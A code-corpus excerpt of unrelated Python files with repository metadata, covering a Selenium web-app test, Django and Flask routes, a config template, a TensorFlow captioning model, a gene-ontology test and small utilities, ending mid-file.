print("Testing Appointments Start")
self.SwitchToPage(self.APPOINTMENTS)
print("Testing Appointments Finish")
self.Sleep(3)
def AppointmentsDetails(self):
print("Testing Appointments Details Start")
self.SwitchToPage(self.APPOINTMENT_DETAILS)
self.SendKeysToElement(self.GetElementById("txtAppointmentDate"), "02/01/2023")
self.Browser.find_element_by_xpath("//select[@id='DropDownListHour']").click()
self.Browser.find_element_by_xpath("//option[@value='07']").click()
self.Browser.find_element_by_xpath("//select[@id='DropDownListMinute']").click()
self.Browser.find_element_by_xpath("//option[@value='45']").click()
self.SendKeysToElement(self.GetElementById("txtPaid"), "Cakes")
self.Browser.find_element_by_xpath("//input[@id='chkPaid']").click()
self.SendKeysToElement(self.GetElementById("txtComments"), "Cakes are tasty and good yis")
self.Browser.find_element_by_xpath("//div//div//div//table[@id='GridViewPets']//tbody//tr[2]//td[1]//input[1]").click()
self.Browser.find_element_by_xpath("//div//div//div//table[@id='GridViewVets']//tbody//tr[2]//td[1]//input[1]").click()
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.Browser.find_element_by_xpath("//div[@id='Panel1']//div//div//tbody//tr[4]//td[1]//input[1]").click()
self.Browser.find_element_by_xpath("//input[@id='txtQuantity']").click()
self.SendKeysToElement(self.GetElementById("txtQuantity"), "2")
self.Browser.find_element_by_xpath("//input[@id='btnAddMedication']").click()
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.SendKeysToElement(self.GetElementById("txtSearchPet"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearchPet']").click()
self.SendKeysToElement(self.GetElementById("txtSearchVet"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearchVet']").click()
self.SendKeysToElement(self.GetElementById("txtSearchInventory"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearchInventory']").click()
print("Testing Appointments Details Finish")
self.Sleep(3)
def RunCommands(self):
self.PetOwners()
self.PetOwnersDetails()
self.Inventory()
self.Vets()
self.VetsDetails()
self.Appointments()
self.AppointmentsDetails()
self.Appointments()
print("---------------------------")
print("-- All Tests Complete --")
print("---------------------------")
pgs = PageGetSet() | 2.625 | 3 |
pages/urls.py | Garinmckayl/monet | 0 | 12795684 | from unicodedata import name
from accounts import views as account_views
from django.urls import path, reverse
from .views import (AboutPageView, AuctionCreateView, AuctionDetailView, AuctionListView, BidCreateView, BidDetailView,
DashboardPageView, DatasourceView, HomePageView, StripeConnectionView,MyAuctionDetailView,AuctionUpdateView)
urlpatterns = [
path('', HomePageView.as_view(), name='home'),
path('about/', AboutPageView.as_view(), name='about'),
path('dashboard/', DashboardPageView.as_view(), name='dashboard'),
path('auctions/', AuctionListView.as_view(), name='auctions'),
path('auction-detail/<int:pk>/', AuctionDetailView.as_view(), name='auction-detail'),
path('auctions/create/',AuctionCreateView.as_view(), name= 'auction-create'),
path('bids/create/',BidCreateView.as_view(), name= 'bid-create'),
path('bid-detail/<int:pk>/', BidDetailView.as_view(), name='bid-detail'),
path('stripe-connection/', StripeConnectionView.as_view(), name='stripe-connection'),
path('data-source/',DatasourceView.as_view(), name='data-source'),
path('dashboard/my-auction/', MyAuctionDetailView.as_view(),name='my-auction'),
path('auction-update/<int:pk>/',AuctionUpdateView.as_view(), name='auction-update'),
path('dashboard/company/my-company', account_views.MyCompanyDetailView.as_view(), name='my-company'),
path('dashboard/company/<int:pk>/', account_views.CompanyUpdateView.as_view(), name="company-update"),
path('dashboard/company/create/', account_views.CompanyCreateView.as_view(), name='company-create'),
path('dashboard/connect/', account_views.connect, name="connect"),
path('dashboard/my-account/', account_views.AccountDetailView.as_view(), name='my-account'),
]
| 1.929688 | 2 |
config.py | JamaSoftware/sync-status | 0 | 12795685 | <filename>config.py
# Connection Settings
JAMA_CONNECT_URL = "https://instance.jamacloud.com"
USERNAME = "USERNAME"
PASSWORD = "PASSWORD"
# If using oauth, set OAUTH = True, set USERNAME = "CLIENT_ID" and PASSWORD="<PASSWORD>"
OAUTH = False
# Input / Output settings
filter_id = 165
# Project's to check sync status against.
# This value should be a list ex: [14]
# To check against mutiple specified projects: ex: [15, 17]
# Use the empty list to check all against all projects ex: []
project_list = []
# if your filter is set to use 'Current Project' then you must supply a project_id. otherwise set to None
filter_project_id = None
# Enter the location for the output.
output_location = "./sync_status.csv"
# CSV Settings
# Output header row in CSV. Must be set to True or False
csv_header = True
# A one character string to separate values.
delimiter = ','
# Logging date time format
log_date_time_format = "%Y-%m-%d %H_%M_%S"
| 2.046875 | 2 |
modules/duckduckgo.py | dngfx/MagicBot | 1 | 12795686 | <reponame>dngfx/MagicBot
# --depends-on commands
from src import ModuleManager, utils
URL_DDG = "https://api.duckduckgo.com"
class Module(ModuleManager.BaseModule):
_name = "DDG"
@utils.hook("received.command.duckduckgo", alias_of="ddg")
@utils.hook("received.command.ddg", min_args=1)
def duckduckgo(self, event):
"""
:help: Get first DuckDuckGo result for a given search term
:usage: [search term]
"""
phrase = event["args"] or event["target"].buffer.get()
if phrase:
page = utils.http.request(
URL_DDG,
get_params={
"q": phrase,
"format": "json",
"no_html": "1",
"no_redirect": "1",
},
).json()
if page and page["AbstractURL"]:
event["stdout"].write(page["AbstractURL"])
else:
event["stderr"].write("No results found")
| 2.359375 | 2 |
src/__init__.py | hoaphumanoid/twitter_bot | 6 | 12795687 | <gh_stars>1-10
__title__ = 'Twitter bot'
__version__ = '1.0'
__author__ = '<NAME>'
__license__ = 'MIT license'
__copyright__ = 'Copyright 2016 <NAME>'
# Version synonym
VERSION = __version__ | 1.007813 | 1 |
log_group_subscriber/util.py | oslokommune/okdata-log-group-subscriber | 0 | 12795688 | <gh_stars>0
import os
def getenv(name):
"""Return the environment variable named `name`, or raise OSError if unset."""
env = os.getenv(name)
if not env:
raise OSError(f"Environment variable {name} is not set")
return env
| 2.828125 | 3 |
base_model.py | chapternewscu/tensorflow_visual_attention | 0 | 12795689 | <gh_stars>0
import os
import sys
import json
import numpy as np
import pandas as pd
import tensorflow as tf
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from tqdm import tqdm
from dataset import *
from utils.words import *
from utils.coco.coco import *
from utils.coco.pycocoevalcap.eval import *
class ImageLoader(object):
def __init__(self, mean_file):
self.bgr = True
self.scale_shape = np.array([224, 224], np.int32)
self.crop_shape = np.array([224, 224], np.int32)
self.mean = np.load(mean_file).mean(1).mean(1)
def load_img(self, img_file):
""" Load and preprocess an image. """
img = cv2.imread(img_file)
if self.bgr:
temp = img.swapaxes(0, 2)
temp = temp[::-1]
img = temp.swapaxes(0, 2)
img = cv2.resize(img, (self.scale_shape[0], self.scale_shape[1]))
offset = (self.scale_shape - self.crop_shape) / 2
offset = offset.astype(np.int32)
img = img[offset[0]:offset[0]+self.crop_shape[0], offset[1]:offset[1]+self.crop_shape[1], :]
img = img - self.mean
return img
def load_imgs(self, img_files):
""" Load and preprocess a list of images. """
imgs = []
for img_file in img_files:
imgs.append(self.load_img(img_file))
imgs = np.array(imgs, np.float32)
return imgs
class BaseModel(object):
def __init__(self, params, mode):
self.params = params
self.mode = mode
self.batch_size = params.batch_size if mode=='train' else 1
self.cnn_model = params.cnn_model
self.train_cnn = params.train_cnn
self.init_lstm_with_fc_feats = params.init_lstm_with_fc_feats if self.cnn_model=='vgg16' else False
self.class_balancing_factor = params.class_balancing_factor
self.save_dir = os.path.join(params.save_dir, self.cnn_model+'/')
self.word_table = WordTable(params.vocab_size, params.dim_embed, params.max_sent_len, params.word_table_file)
self.word_table.load()
self.img_loader = ImageLoader(params.mean_file)
self.img_shape = [224, 224, 3]
self.global_step = tf.Variable(0, name = 'global_step', trainable = False)
self.build()
self.saver = tf.train.Saver(max_to_keep = 100)
def build(self):
raise NotImplementedError()
def get_feed_dict(self, batch, is_train, contexts=None, feats=None):
raise NotImplementedError()
def train(self, sess, train_coco, train_data):
""" Train the model. """
print("Training the model...")
params = self.params
num_epochs = params.num_epochs
for epoch_no in tqdm(list(range(num_epochs)), desc='epoch'):
for idx in tqdm(list(range(train_data.num_batches)), desc='batch'):
batch = train_data.next_batch()
if self.train_cnn:
# Train CNN and RNN
feed_dict = self.get_feed_dict(batch, is_train=True)
_, loss0, loss1, global_step = sess.run([self.opt_op, self.loss0, self.loss1, self.global_step], feed_dict=feed_dict)
else:
# Train RNN only
img_files, _, _ = batch
imgs = self.img_loader.load_imgs(img_files)
if self.init_lstm_with_fc_feats:
contexts, feats = sess.run([self.conv_feats, self.fc_feats], feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=True, contexts=contexts, feats=feats)
else:
contexts = sess.run(self.conv_feats, feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=True, contexts=contexts)
_, loss0, loss1, global_step = sess.run([self.opt_op, self.loss0, self.loss1, self.global_step], feed_dict=feed_dict)
print(" Loss0=%f Loss1=%f" %(loss0, loss1))
if (global_step + 1) % params.save_period == 0:
self.save(sess)
train_data.reset()
self.save(sess)
print("Training complete.")
def val(self, sess, val_coco, val_data):
""" Validate the model. """
print("Validating the model ...")
results = []
result_dir = self.params.val_result_dir
# Generate the captions for the images
for k in tqdm(list(range(val_data.count))):
batch = val_data.next_batch()
img_files = batch
img_file = img_files[0]
img_name = os.path.splitext(img_file.split(os.sep)[-1])[0]
if self.train_cnn:
feed_dict = self.get_feed_dict(batch, is_train=False)
else:
img_files = batch
imgs = self.img_loader.load_imgs(img_files)
if self.init_lstm_with_fc_feats:
contexts, feats = sess.run([self.conv_feats, self.fc_feats], feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts, feats=feats)
else:
contexts = sess.run(self.conv_feats, feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts)
result = sess.run(self.results, feed_dict=feed_dict)
sentence = self.word_table.indices_to_sent(result.squeeze())
results.append({'image_id': val_data.img_ids[k], 'caption': sentence})
# Save the result in an image file
img = mpimg.imread(img_file)
plt.imshow(img)
plt.axis('off')
plt.title(sentence)
plt.savefig(os.path.join(result_dir, img_name+'_result.jpg'))
val_data.reset()
# Evaluate these captions
val_res_coco = val_coco.loadRes2(results)
scorer = COCOEvalCap(val_coco, val_res_coco)
scorer.evaluate()
print("Validation complete.")
def test(self, sess, test_data, show_result=False):
""" Test the model. """
print("Testing the model ...")
result_file = self.params.test_result_file
result_dir = self.params.test_result_dir
captions = []
# Generate the captions for the images
for k in tqdm(list(range(test_data.count))):
batch = test_data.next_batch()
img_files = batch
img_file = img_files[0]
img_name = os.path.splitext(img_file.split(os.sep)[-1])[0]
if self.train_cnn:
feed_dict = self.get_feed_dict(batch, is_train=False)
else:
imgs = self.img_loader.load_imgs(img_files)
if self.init_lstm_with_fc_feats:
contexts, feats = sess.run([self.conv_feats, self.fc_feats], feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts, feats=feats)
else:
contexts = sess.run(self.conv_feats, feed_dict={self.imgs:imgs, self.is_train:False})
feed_dict = self.get_feed_dict(batch, is_train=False, contexts=contexts)
result = sess.run(self.results, feed_dict=feed_dict)
sentence = self.word_table.indices_to_sent(result.squeeze())
captions.append(sentence)
# Save the result in an image file
img = mpimg.imread(img_file)
plt.imshow(img)
plt.axis('off')
plt.title(sentence)
plt.savefig(os.path.join(result_dir, img_name+'_result.jpg'))
# Save the captions to a file
results = pd.DataFrame({'image_files':test_data.img_files, 'caption':captions})
results.to_csv(result_file)
print("Testing complete.")
def save(self, sess):
""" Save the model. """
print(("Saving model to %s" % self.save_dir))
self.saver.save(sess, self.save_dir, self.global_step)
def load(self, sess):
""" Load the model. """
print("Loading model...")
checkpoint = tf.train.get_checkpoint_state(self.save_dir)
if checkpoint is None:
print("Error: No saved model found. Please train first.")
sys.exit(0)
self.saver.restore(sess, checkpoint.model_checkpoint_path)
def load2(self, data_path, session, ignore_missing=True):
""" Load a pretrained CNN model. """
print("Loading CNN model from %s..." %data_path)
data_dict = np.load(data_path).item()
count = 0
miss_count = 0
for op_name in data_dict:
with tf.variable_scope(op_name, reuse=True):
for param_name, data in data_dict[op_name].iteritems():
try:
var = tf.get_variable(param_name)
session.run(var.assign(data))
count += 1
#print("Variable %s:%s loaded" %(op_name, param_name))
except ValueError:
miss_count += 1
#print("Variable %s:%s missed" %(op_name, param_name))
if not ignore_missing:
raise
print("%d variables loaded. %d variables missed." %(count, miss_count))
| 2.375 | 2 |
mitty/plugins/population/vn.py | latticelabs/Mitty-deprecated- | 1 | 12795690 | """A population model that creates samples with more and more variants. Suitable for the aligner paper experiments
^ = intersection
E = subset
vx ^ v0 = v0
vx ^ v1 = v0
...
vx ^ vn = v0
v0 E v1
v1 E v2
v2 E v3
...
v(n-1) E vn
This plugin does not honor the site frequency spectrum model and ignores the original 'p' values
"""
import numpy as np
__example_param_text = """
{
"vn": {
"p_vx": 0.2,
"p_vn": [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7],
}
}
"""
_description = __doc__ + '\nExample parameters:\n' + __example_param_text
#_example_params = json.loads(__example_param_text)
_example_params = eval(__example_param_text)
class Model:
def __init__(self, p_vx, p_vn):
"""A population model that creates samples with more and more variants. Suitable for the aligner paper experiments
:param p_vx: probability value for vx set
:param p_vn: probability values for v0, v1, v2, v3 .... set
"""
self.p_vx, self.p_vn = p_vx, p_vn
def samples(self, chrom_no=None, ml=None, rng_seed=1, **kwargs):
"""This returns an iterator
:param chrom_no: number of the chromosome being considered [1,2,3 ...] (ignored here)
:param ml: VariantList. master list of variants as created by genomes program
:param rng_seed: seed for random number generators
:return: A generator returning (generation no, serial_no, chromosome, % samples done) for each sample in population
Algorithm: (Repeat for each chromosome copy)
Generate random numbers r same size as variants list
Select vx <= r < p_vx
Pick a random subset of v0 as v1 size(v1)/size(v0) = p_v1/p_v0
Set all r corresponding to v0 - v1 as 1.0 so we never select these again
Pick v2, v3 ... by comparing r to p_v2, p_v3 and so on
"""
assert 0 <= self.p_vx <= 1.0, 'p_vx needs to be >= 0 and <= 1.0'
assert self.p_vx > self.p_vn[0], 'p_vx needs to be > p_vn[0]'
for n in range(len(self.p_vn) - 1):
assert self.p_vn[n] < self.p_vn[n + 1], 'p_vn needs to be in ascending order'
assert 0 <= self.p_vn[n] <= 1.0, 'p_vn needs to be >= 0 and <= 1.0'
rng = np.random.RandomState(rng_seed)
r = rng.rand(ml.variants.shape[0], 2)
idx_vx = [None, None]
for cpy in [0, 1]:
idx_vx[cpy] = np.sort(rng.choice(ml.variants.shape[0], size=int(ml.variants.shape[0] * self.p_vx), replace=False))
# Take elements in vx that are not going to be in v0 completely out of circulation
r[idx_vx[cpy][(r[idx_vx[cpy]] >= self.p_vn[0]).nonzero()[0]], cpy] = 1.1
# Now all elements for r < 1.0 are either in vx ^ v0 or not in vx
for n in range(len(self.p_vn) + 1):
if n == 0:
this_idx, sample_name = idx_vx, 'vx'
else:
this_idx, sample_name = [(r[:, cpy] < self.p_vn[n - 1]).nonzero()[0] for cpy in [0, 1]], 'v{:d}'.format(n - 1)
yield sample_name, ml.zip_up_chromosome(*this_idx), float(n + 1) / self.get_sample_count_estimate()
def get_sample_count_estimate(self):
"""Give us an as exact as possible estimate of how many samples we will produce"""
return 1 + len(self.p_vn) | 2.890625 | 3 |
tests/test_gosubdag_relationships_i126.py | flying-sheep/goatools | 477 | 12795691 | #!/usr/bin/env python
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# tests/test_gosubdag_relationships_i126.py
# goatools/gosubdag/gosubdag.py
# goatools/gosubdag/godag_rcnt.py
# goatools/gosubdag/godag_rcnt_init.py
# goatools/godag/go_tasks.py
# goatools/obo_parser.py
from __future__ import print_function
__copyright__ = "Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved."
from os.path import join
from os import system
import sys
## import timeit
## import datetime
import collections as cx
from goatools.base import get_godag
from goatools.godag.consts import RELATIONSHIP_SET
from goatools.gosubdag.gosubdag import GoSubDag
from goatools.test_data.wr_subobo import WrSubObo
from tests.utils import REPO
# pylint: disable=line-too-long,unused-variable
def test_gosubdag_relationships(wr_new_obo_subset=False):
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# Leaf GO: viral triggering of virus induced gene silencing
goid_chosen = 'GO:0060150'
# Load GODag with all relationships
fin_obo = join(REPO, "tests/data/i126/viral_gene_silence.obo") # "go-basic.obo")
godag_r0 = get_godag(fin_obo, loading_bar=None)
godag_r1 = get_godag(fin_obo, loading_bar=None, optional_attrs=['relationship'])
file_sub = join(REPO, "tests/data/viral_gene_silence.obo")
# Get all GO terms above this low-level GO ID using all relationships
if wr_new_obo_subset:
_wr_sub_obo(file_sub, goid_chosen, godag_r1, fin_obo)
# RELATIONSHIPS: None
gosubdag_r0 = GoSubDag(set([goid_chosen]), godag_r0)
assert len(gosubdag_r0.rcntobj.go2ancestors[goid_chosen]) == 12
# RELATIONSHIPS: ALL
gosubdag_r1 = GoSubDag(set([goid_chosen]), godag_r1, relationships=True)
assert gosubdag_r1.relationships == RELATIONSHIP_SET
#### set(['part_of', 'regulates', 'positively_regulates', 'negatively_regulates'])
assert len(gosubdag_r1.rcntobj.go2ancestors[goid_chosen]) == 50
# RELATIONSHIPS: part_of
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'})
assert gosubdag_rp.relationships == set(['part_of'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: regulates
gosubdag_rr = GoSubDag(set([goid_chosen]), godag_r1, relationships={'regulates'})
assert gosubdag_rr.relationships == set(['regulates'])
rp_par = gosubdag_rr.rcntobj.go2ancestors[goid_chosen]
# assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
# assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: positively_regulates
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'positively_regulates'})
assert gosubdag_rp.relationships == set(['positively_regulates'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: negatively_regulates
gosubdag_rn = GoSubDag(set([goid_chosen]), godag_r1, relationships={'negatively_regulates'})
assert gosubdag_rn.relationships == set(['negatively_regulates'])
rp_par = gosubdag_rn.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: regulates positively_regulates negatively_regulates
regs = {'positively_regulates', 'negatively_regulates'}
gosubdag_rnp = GoSubDag(set([goid_chosen]), godag_r1, relationships=regs)
assert gosubdag_rnp.relationships == regs
rp_par = gosubdag_rnp.rcntobj.go2ancestors[goid_chosen]
_run_baseline_r0(gosubdag_r0, gosubdag_r1)
# BASELINE r1: Test that GOTerm.get_all_upper() is the same as GoSubDag ancestors
for goid, term in gosubdag_r1.go2obj.items():
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r1 == term.get_all_upper()
#### # Test that
#### gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'}, prt=sys.stdout)
#### for goid, dag_term in godag_r1.items():
#### if goid in gosubdag_r1.rcntobj.go2ancestors:
#### ancestors = gosubdag_rp.rcntobj.go2ancestors[goid]
#### sub_term = gosubdag_rp.go2obj[goid]
#### reldict = sub_term.relationship.items()
#### # print(goid)
#### # print('DAG', sorted(dag_term.get_all_upper()))
#### # print('SUB', sorted(sub_term.get_all_upper()))
#### # print('ANS', sorted(ancestors))
#### # for rel, pterms in cx.OrderedDict(reldict).items():
#### # print(rel, ' '.join(sorted(o.id for o in pterms)))
#### # print('')
#### print(gosubdag_rp.relationships)
#### #assert 'GO:0016441' not in gosubdag_rp.rcntobj.go2ancestors['GO:0060150']
#### assert 'GO:0016441' in gosubdag_r1.go2nt
#### assert 'GO:0010467' in gosubdag_r1.go2nt
def _run_baseline_r0(gosubdag_r0, gosubdag_r1):
"""BASELINE r0: Test that GOTerm.get_all_parents() == GoSubDag ancestors"""
r1_ancestors_more = set()
# Loop through r0 GO IDs
for goid, term in gosubdag_r0.go2obj.items():
ancestors_r0 = gosubdag_r0.rcntobj.go2ancestors.get(goid, set())
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r0 == term.get_all_parents()
assert ancestors_r0.issubset(ancestors_r1)
if len(ancestors_r0) < len(ancestors_r1):
r1_ancestors_more.add(goid)
assert r1_ancestors_more
print('{N} r1 GO terms in GoSubDag have more ancestors than r0'.format(
N=len(r1_ancestors_more)))
# scripts/go_plot.py --go_file=i126_goids_baseline.txt -r --obo=tests/data/viral_gene_silence.obo -o i126_goids_baseline.png
fout_gos = 'i126_goids_baseline.txt'
with open(fout_gos, 'w') as prt:
prt.write('#cafffb {SRC_GO}\n'.format(SRC_GO=next(iter(gosubdag_r0.go_sources))))
_prt_goterms(r1_ancestors_more, gosubdag_r1.go2nt, prt)
print(' WROTE: {GOs}'.format(GOs=fout_gos))
def _prt_goterms(goids, go2nt, prt):
"""Print details of GO terms"""
fmt = ('#ffd1df {GO} # {NS} {dcnt:5} {childcnt:3} '
'L{level:02} D{depth:02} R{reldepth:02} {D1:5} {REL} {rel} {GO_name}\n')
nts = [nt for go, nt in go2nt.items() if go in goids]
for ntd in sorted(nts, key=lambda nt: nt.dcnt, reverse=True):
prt.write(fmt.format(**ntd._asdict()))
#cafffb GO:0060150
#ffd1df GO:0050794 # BP 8278 64 D03 R03 regulation of cellular process
#ffd1df GO:0019222 # BP 3382 20 D03 R03 regulation of metabolic process
#ffd1df GO:0048522 # BP 2417 65 D04 R04 positive regulation of cellular process
#ffd1df GO:0060255 # BP 2130 20 D04 R04 regulation of macromolecule metabolic process
#ffd1df GO:0010468 # BP 862 20 D05 R05 regulation of gene expression
#ffd1df GO:0060968 # BP 53 4 D06 R08 regulation of gene silencing
#ffd1df GO:0060147 # BP 24 4 D07 R09 regulation of posttranscriptional gene silencing
#ffd1df GO:0060148 # BP 8 3 D08 R10 positive regulation of posttranscriptional gene silencing
#ffd1df GO:0060150 # BP 0 0 D09 R11 viral triggering of virus induced gene silencing
# - Generate GO DAG subset for this test ---------------------------------------------------------
def _wr_sub_obo(fout_obo, goid_chosen, godag_r1, fin_obo):
"""Sub plot used for visualizing this test file's elements"""
# Load GO-DAG: Load optional 'relationship'
godag = {go:o for go, o in godag_r1.items() if go == o.item_id}
_prt_rtel_ctr(godag)
rels_all = set(['part_of', 'regulates', 'negatively_regulates', 'positively_regulates'])
goids_leaf_all = set(o.id for o in godag.values() if not o.children)
gosubdag_r1 = GoSubDag(goids_leaf_all, godag, relationships=True, prt=sys.stdout)
goids_src_r1_all = _get_leafs_w_relsinhier(rels_all, gosubdag_r1)
gosubdag_r1.prt_goids(goids_src_r1_all)
# Pick one of the GO IDs as a source for the subset DAG
gosubdag_viral = GoSubDag({goid_chosen}, godag, relationships=True, prt=sys.stdout)
goids_viral = set(gosubdag_viral.go2obj.keys())
with open(fout_obo, 'w') as prt:
WrSubObo.prt_goterms(fin_obo, goids_viral, prt)
print('{N} GO IDs WROTE: {OBO}'.format(N=len(goids_viral), OBO=fout_obo))
# Plot obo subset
pat_r1 = '{REPO}/scripts/go_plot.py {GO} -o {PNG} -r'
pat_r0 = '{REPO}/scripts/go_plot.py {GO} -o {PNG}'
system(pat_r1.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r1.png'), GO=goid_chosen))
system(pat_r0.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r0.png'), GO=goid_chosen))
def _get_leafs_w_relsinhier(rels_usr, gosubdag_r1):
"""Get GO IDs that have all relationships up their hierarchy."""
gos_r1_relsinhier = set()
goids_leaf = set(o.id for o in gosubdag_r1.go2obj.values() if not o.children)
for goid in goids_leaf:
go_parents = gosubdag_r1.rcntobj.go2ancestors[goid]
rels = set(k for p in go_parents for k in gosubdag_r1.go2obj[p].relationship.keys())
if rels == rels_usr:
gos_r1_relsinhier.add(goid)
return gos_r1_relsinhier
def _prt_rtel_ctr(godag):
"""Print the count of relationships."""
objs_r1_all = set(o for o in godag.values() if o.relationship.keys())
octr = cx.Counter(k for o in objs_r1_all for k in o.relationship.keys())
# objs_r1_sub = set(o.id for o in objs_r1_all if not rels_all.isdisjoint(o.relationship.keys()))
print('{N:6,} GO Terms have relationships.'.format(N=len(objs_r1_all)))
for key, cnt in octr.most_common():
print('{N:6,} {REL}'.format(N=cnt, REL=key))
# def _chk_child_parent(go2o_dag, go2o_sub):
# """Check the differences between the two go2obb dicts."""
# pass
if __name__ == '__main__':
test_gosubdag_relationships(len(sys.argv) != 1)
# Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved.
| 2.09375 | 2 |
booleans_operators.py | CrazyJ36/python | 0 | 12795692 | <reponame>CrazyJ36/python
#!/usr/bin/env python3
# and, or, not
if 1 < 2 and 1 < 3:
print("true")
else:
print("false")
if 1 < 0 or 1 > 2:
print("true")
else:
print("false")
if 1 != 2:
print("true")
if 1 != 2:
print("true")
if not 1 < 0: # "not <expr>" means false
print("1 is not less than 0")
| 4.4375 | 4 |
base/apis/views.py | danielecook/upvote.pub | 1 | 12795693 | <filename>base/apis/views.py
# -*- coding: utf-8 -*-
"""
All view code for async get/post calls towards the server
must be contained in this file.
"""
import arrow
from flask import (Blueprint, request, render_template, flash, g,
session, redirect, url_for, jsonify, abort)
from werkzeug import check_password_hash, generate_password_hash
from logzero import logger
from base import db
from base.users.models import User
from base.threads.models import Thread, Comment
from base.users.decorators import requires_login
from base.utils.misc import generate_csrf_token
from base.utils.text_utils import format_comment
mod = Blueprint('apis', __name__, url_prefix='/apis')
@mod.before_request
def before_request():
g.user = None
if 'user_id' in session:
g.user = User.query.get(session['user_id'])
@mod.before_request
def csrf_protect():
if request.method == "POST":
token = session.pop('csrf_token', None)
if not token or token != request.form.get('csrf_token'):
abort(403)
@mod.route('/comments/submit/', methods=['POST'])
@requires_login
def submit_comment():
"""
Submit comments via ajax
"""
# Check that user has not submitted more than 20 comments
# in the last hour.
user_id = g.user.id
if not user_id:
abort(404)
since = arrow.utcnow() - arrow.utcnow().shift(hours=-1).datetime
submission_count = Comment.query.filter(Comment.user_id == user_id, Comment.created_on > since).count()
if submission_count >= 20:
return jsonify(error='You have been submitting too many comments')
thread_id = int(request.form['thread_id'])
comment_text = request.form['comment_text']
comment_parent_id = request.form['parent_id'] # empty means none
if not comment_text:
abort(404)
thread = Thread.query.get_or_404(int(thread_id))
thread.n_comments += 1
db.session.commit()
comment = thread.add_comment(comment_text,
comment_parent_id,
g.user.id)
return jsonify(comment_text=format_comment(comment.text),
date=comment.pretty_date(),
username=g.user.username,
comment_id=comment.id,
csrf_token=generate_csrf_token())
@mod.route('/threads/vote/', methods=['POST'])
@requires_login
def vote_thread():
"""
Submit votes via ajax
"""
thread_id = int(request.form['thread_id'])
user_id = g.user.id
if not thread_id:
abort(404)
thread = Thread.query.get_or_404(int(thread_id))
vote_status = thread.vote(user_id=user_id)
return jsonify(new_votes=thread.votes,
vote_status=vote_status,
csrf_token=generate_csrf_token())
@mod.route('/threads/save/', methods=['POST'])
@requires_login
def save_thread():
"""
Submit votes via ajax
"""
thread_id = int(request.form['thread_id'])
user_id = g.user.id
if not thread_id:
abort(404)
thread = Thread.query.get_or_404(int(thread_id))
save_status = thread.save(user_id=user_id)
return jsonify(new_saves=thread.saves,
save_status=save_status,
csrf_token=generate_csrf_token())
@mod.route('/comments/vote/', methods=['POST'])
@requires_login
def vote_comment():
"""
Submit votes via ajax
"""
comment_id = int(request.form['comment_id'])
user_id = g.user.id
if not comment_id:
abort(404)
comment = Comment.query.get_or_404(int(comment_id))
comment.vote(user_id=user_id)
logger.info(comment.votes)
return jsonify(votes=comment.votes,
csrf_token=generate_csrf_token())
| 2.28125 | 2 |
robotpose/__init__.py | OSU-AIMS/RoPE-S3D | 1 | 12795694 | from .wizards import Wizard
from .data import Dataset, DatasetInfo, AutomaticAnnotator
from .simulation import Renderer, DatasetRenderer, RobotLookupCreator
from .prediction import Predictor, LiveCamera
from .paths import Paths
from .prediction.analysis import Grapher
from .prediction.synthetic import SyntheticPredictor
from .textfile_integration import JSONCoupling
from .projection import Intrinsics
import logging
logging.basicConfig(level=logging.INFO)
Paths().create()
| 1.21875 | 1 |
altair/vegalite/v2/schema/__init__.py | hydrosquall/altair | 0 | 12795695 | <filename>altair/vegalite/v2/schema/__init__.py
from .core import *
from .channels import * | 1.078125 | 1 |
code/1078.py | Nightwish-cn/my_leetcode | 23 | 12795696 | <reponame>Nightwish-cn/my_leetcode<filename>code/1078.py
class Solution:
def findOcurrences(self, text: str, first: str, second: str) -> List[str]:
lis = text.split()
l = len(lis)
return [lis[i + 2] for i in range(0, l - 2) if lis[i] == first and lis[i + 1] == second] | 2.96875 | 3 |
Tectonic_Utils/geodesy/euler_pole.py | kmaterna/Utility_Code | 4 | 12795697 | """
Functions to rotate a point by a known euler pole.
"""
import numpy as np
from . import fault_vector_functions
def point_rotation_by_Euler_Pole(Point, Euler_Pole):
"""
Compute the velocity of rotation of a point about an Euler pole on a spherical earth.
This function is useful for computing the velocity of a stationary point in one reference frame
with respect to another reference frame.
The resulting velocity is assumed to be horizontal.
:param Point: [longitude, latitude] of observation point, in degrees
:type Point: array_like
